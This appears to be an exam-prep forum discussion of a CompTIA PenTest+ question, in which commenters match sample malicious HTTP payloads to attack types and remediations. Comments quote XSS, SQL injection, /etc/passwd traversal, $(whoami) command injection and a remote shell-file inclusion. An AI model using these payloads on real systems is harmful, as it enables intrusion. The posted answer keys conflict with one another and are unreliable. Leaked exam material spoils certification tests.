ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT1-002 All Questions

View all questions & answers for the PT1-002 exam
Go to Exam

Exam PT1-002 topic 1 question 7 discussion

Actual exam question from CompTIA's PT1-002
Question #: 7
Topic #: 1
[All PT1-002 Questions]

HOTSPOT -
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS -
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Show Suggested Answer Hide Answer
Suggested Answer:
by Picklefall1 at Oct. 30, 2021, 5 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
timd
Highly Voted 3 years, 3 months ago
1. Dom XSS - input san. <,> https://portswigger.net/web-security/cross-site-scripting/dom-based 2. SQLi Stacked - Parameterized Queries 3. SQLi Union - Parameterized Queries 4. Reflected XSS - input san <,> https://portswigger.net/web-security/cross-site-scripting/reflected 5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql-injection/#Error_Based_SQL_Injection 6. CMD Injection - Input San. /,\ Sandbox 7. URL Redirect - Prevent ext. calls 8. local file inclusion - Input san. /,\ Sandbox 9. CMD Injection - input san. [,],(,) 10. Remote File Inclusion - input san. /,\ Sandbox
upvoted 24 times
Sweety_Certified7
8 months ago
For Payload 1. #inner-tab"><script>alert(1)</script> Given: "You are a security analyst tasked with hardening a web server." Since the focus is on server hardening, addressing server-side vulnerabilities like Reflected XSS would be the main priority. Therefore, it's safe to conclude that Reflected XSS is the more appropriate choice in this server-focused context.
upvoted 1 times
...
[Removed]
2 years, 10 months ago
Thank you for your time and effort, this is definitely the best answer there is
upvoted 3 times
...
RightAsTain
2 years, 9 months ago
Verified everyone in the book and looked up all the ASCII chars. Good to go. Thanks for making that one easy.
upvoted 4 times
...
...
MeisAdriano
Most Recent 11 months ago
1) #Inner-Tab = DOM XSS - Input sanitization (<> ...) Explanation: “inner-tab” is a CSS id-selector and can be used to identify in unique way an element in your HTML code. It could be something like: <div id="inner-tab">Some content inside here</div> The code maybe use something like <script> document.getElementById('inner-tab').style.display = 'none'; </script> Or in jquery: $('#inner-tab').hide(); And you could attack via XSS injecting a DOM: <script>document.getElementById('inner-tab').innerHTML = ‘Changed via XSS attack';</script> Solution: input sanization of < and > will help to not include HTML tags.
upvoted 1 times
MeisAdriano
11 months ago
8) logfile=%2fetc%2fpasswd%00 Decoded is : logfile=/etc/passwd and at the end %00 terminate the string to ignore if the application will append something else. In the real world we have to validate input, limit priviledge, use secure API, escaping of input and query parameterizing. Solution: input sanization / and \ so we can’t browse across directory, but also a “sandbox requests” to deny access to specific resources of the operating system.
upvoted 1 times
...
MeisAdriano
11 months ago
9) lookup=$(whoami) Command injection, this scenario is trying to execute the *nix command “whoami”. Solution: We can solve it using a sandbox to deny access to specific commands of the operating system; that’s the most appropriate answer.
upvoted 1 times
...
MeisAdriano
11 months ago
10) logfile=http:%2f%2fwww.malicious-site.cm%2fshell.txt (RFI) Remote file inclusion, he is trying to show on the screen the txt, but that’s a malicious shell, so could be dangerous if included. Example: <?php $logfile = $_GET['logfile']; include($logfile); ?> Solution: preventing external calls
upvoted 1 times
...
MeisAdriano
11 months ago
2) item=widget';waitfor%20delay%20'00:00:20';-- That’s an example of SQL Injection, for many reason, one of them because we see double dash that means “from here a comment” in SQL. SQL Injection is a technique that exploits a webapp that not sanifies property the user input. In this situation the attacker is injecting an SQL instruction: WAITFOR DELAY '00:00:20' The “stacked” word in “SQL Injection Stacked” means the attacker is trying to stack more SQL instructions in one single query. Solution: Parameterized queries (in a real situation, I can’t accept that a database webuser should be granted to execute this kind of queries…)
upvoted 1 times
...
Load full discussion...
...
ResStapler
2 years, 9 months ago
This PBQ reminds me of the Star Trek: The Kobayashi Maru, No-Win Scenario. Knowing the answer 100% seems like the no-win scenario. ## PAYLOADS VULNERABILITY TYPE. REMEDIATION 01 #Inner-Tab = DOM XSS - Input sanitization (<> ...) 02 Item=Widget = SQL Injection STACKED - Parameterized Queries 03 Item=Widget%20. = SQLi UNION - Parameterized Queries 04 Search=BOB = Reflected XSS. - Input sanitization (<> ...) 05 Item widget+ convert = SQLi error - Parameterized Queries 06 Site = www. Exa = Command Injection - Sandbox Requests 07 Redirect http: = URL redirect - Preventing External Calls 08 Logfile=%2 = Local File Inclusion - Input Sanitization $ 09 Lookup =$(whoami) = Command Injection - Input Sanitization $ [] () 10 Logfile =http = 2% = Remote File Inclusion - Input Sanitization /,\ Sandbox
upvoted 4 times
...
am2005
3 years, 2 months ago
Inner Tab = Reflected XSS - Input sanitization (<> ...) Item= widget = Sql Injection (Stacked) - Parameterized Queries Item=widget%20.= DOM XSS - Input Sanitization (<> ...) Search=BOB = Local File Inclusion - sandbox req Item widget+ convert = Command Injection - sandbox req Site = www. Exa = SQLi (union) - paramtrized queries Redirect http : . SQLi (error) - paramtrized queries Log file =2% Remote File Inclusion – sandbox Lookup =$ = Command Injection - input saniti $ [] Logfile =http = 2% URL redirect - prevent external calls
upvoted 3 times
...
DrChats
3 years, 6 months ago
The correct answer is: 1. Reflected XSS - Input sanitization (<> ...) 2. Sql Injection Stacked - Parameterized Queries 3. DOM XSS - Input Sanitization (<> ...) 4. Local File Inclusion - sandbox req 5. Command Injection - sandbox req 6. SQLi union - paramtrized queries 7. SQLi error - paramtrized queries 8. Remote File Inclusion - sandbox 9. Command Injection - input saniti $ 10. URL redirect - prevent external calls
upvoted 3 times
DrChats
3 years, 6 months ago
i got them in WRONG order
upvoted 2 times
DrChats
3 years, 6 months ago
these are the RIGHT numbers 1 2 4 8 6 3 5 10 9 7.....
upvoted 6 times
some_specialist
3 years, 3 months ago
I took the above and merged it with the initial comment: 1. Reflected XSS - Input sanitization (<> ...) 2. Sql Injection Stacked - Parameterized Queries 3. Local File Inclusion - sandbox req 4. Remote File Inclusion - sandbox 5. SQLi union - parametrized queries 6. DOM XSS - Input Sanitization (<> ...) 7. Command Injection - sandbox req 8. URL redirect - prevent external calls 9. Command Injection - input saniti $ 10. SQLi error - parametrized queries
upvoted 5 times
rootlikegroot
2 years, 11 months ago
Who can 3 ( item=widget%20union%20select%20null, null, @@version; - -) be a LFI, this is a union attack
upvoted 7 times
...
...
Davar39
3 years, 5 months ago
You are completely right, thank you for putting in the work.
upvoted 7 times
...
...
...
...
Picklefall1
3 years, 8 months ago
There is so much wrong with the revealed answer here that it's a bit much to type all of it out.
upvoted 3 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel